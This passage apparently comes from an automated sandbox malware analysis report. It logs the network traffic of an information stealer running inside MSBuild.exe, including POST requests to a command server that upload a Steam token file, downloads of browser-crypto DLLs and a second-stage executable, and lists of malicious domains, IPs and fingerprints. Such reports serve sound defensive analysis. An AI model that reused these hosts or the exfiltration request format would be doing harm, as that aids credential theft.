0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 2d 2d 0d 0a Data Ascii: ------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------GCBGCAFIIECBFIDHIJKFContent-Disposition: form-data; name="mode"3------GCBGCAFIIECBFIDHIJKF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFHJJJKKFHIDAAKFBFBFHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 42 46 42 46 2d 2d 0d 0a Data Ascii: ------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------KFHJJJKKFHIDAAKFBFBFContent-Disposition: form-data; name="mode"4------KFHJJJKKFHIDAAKFBFBF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCGIJDHDGDBGDGCGCFHHost: lade.petperfectcare.comContent-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4e 4f 6d 77 41 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 47 49 4a 44 48 44 47 44 42 47 44 47 43 47 43 46 48 2d 2d 0d 0a Data Ascii: ------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------EHCGIJDHDGDBGDGCGCFHContent-Disposition: form-data; name="file_data"NOmwAg==------EHCGIJDHDGDBGDGCGCFH--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECFHost: lade.petperfectcare.comContent-Length: 130769Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="mode"5------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJDGCAEBFIIECAKFHIHost: lade.petperfectcare.comContent-Length: 499Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 61 73 6b 5f 69 64 22 0d 0a 0d 0a 31 32 38 34 32 30 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 74 61 74 75 73 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 2d 2d 0d 0a Data Ascii: ------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="mode"51------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="task_id"1284205------BGIJDGCAEBFIIECAKFHIContent-Disposition: form-data; name="status"1------BGIJDGCAEBFIIECAKFHI--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAEHost: lade.petperfectcare.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 32 36 34 30 64 62 65 38 65 66 65 63 34 62 36 66 34 66 62 36 63 61 35 33 35 61 36 63 35 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 36 39 34 62 36 64 35 30 31 39 39 65 61 34 34 32 30 37 61 39 37 65 32 35 64 64 61 35 35 30 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 36 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"372640dbe8efec4b6f4fb6ca535a6c5e------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="build_id"e694b6d50199ea44207a97e25dda5506------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="mode"6------EGIDAAFIEHIEHJKFHCAE--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIDGCAFCBAAAAAFHDAHost: cowod.hopto.orgContent-Length: 5757Connection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 95.164.90.97 95.164.90.97

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VAKPoltavaUkraineUA VAKPoltavaUkraineUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:51636 -> 147.45.44.104:80

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wickedneatr.sbs
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=vmF.kaNqUEmI1.qePWdiTp6vBz.dmeIQmRcdUjlLAWk-1728319428-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: wickedneatr.sbs

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00406963

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sql.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: lade.petperfectcare.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/a43486128347.exe HTTP/1.1Host: nsdm.cumpar-auto-orice-tip.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: lade.petperfectcare.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: nsdm.cumpar-auto-orice-tip.ro
Source: global traffic	DNS traffic detected: DNS query: exemplarou.sbs
Source: global traffic	DNS traffic detected: DNS query: frizzettei.sbs
Source: global traffic	DNS traffic detected: DNS query: isoplethui.sbs
Source: global traffic	DNS traffic detected: DNS query: bemuzzeki.sbs
Source: global traffic	DNS traffic detected: DNS query: exilepolsiy.sbs
Source: global traffic	DNS traffic detected: DNS query: laddyirekyi.sbs
Source: global traffic	DNS traffic detected: DNS query: invinjurhey.sbs
Source: global traffic	DNS traffic detected: DNS query: wickedneatr.sbs
Source: global traffic	DNS traffic detected: DNS query: cowod.hopto.org

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wickedneatr.sbs

Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.EBFIIECAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.CAKFHI
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000FA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org/S
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgCFH
Source: f1r6P3j3g7.exe, 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000003.00000002.2174458155.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orga535a6c5ent-Disposition:
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hopto.orgare.com:80
Source: MSBuild.exe, 00000003.00000002.2174458155.000000000056B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://cowod.hoptoECAKFHI
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
